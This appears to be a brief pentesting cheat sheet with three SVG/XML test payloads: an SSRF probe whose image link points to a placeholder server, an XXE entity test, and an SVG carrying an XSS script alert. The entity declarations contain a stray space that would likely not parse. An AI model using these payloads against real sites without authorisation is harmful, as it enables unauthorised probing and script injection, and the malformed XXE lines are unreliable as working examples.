Server side forgery

<!DOCTYPE testingxxe [ <! ENTITY xml "placeholder"> ]>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> 
<image height="30" width="30" xlink:href="https://<EXAMPLE_SERVER>/image.jpeg" />
</svg>

XML externel entity 

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<! ENTITY example "Hunter"> ]>
<userInfo>
<firstName>SpyEye</firstName>
<lastName>&example; </lastName>
</userInfo>


Cross Site Scripting

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<circle cx="50" cy="50" r="48" fill="none" stroke="#000"/>
<path d="M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48"/>
<circle cx="50" cy="26" r="6"/>
<circle cx="50" cy="74" r="6" fill="#FFF"/>
<script>alert('SpyEye'); </script>
</svg>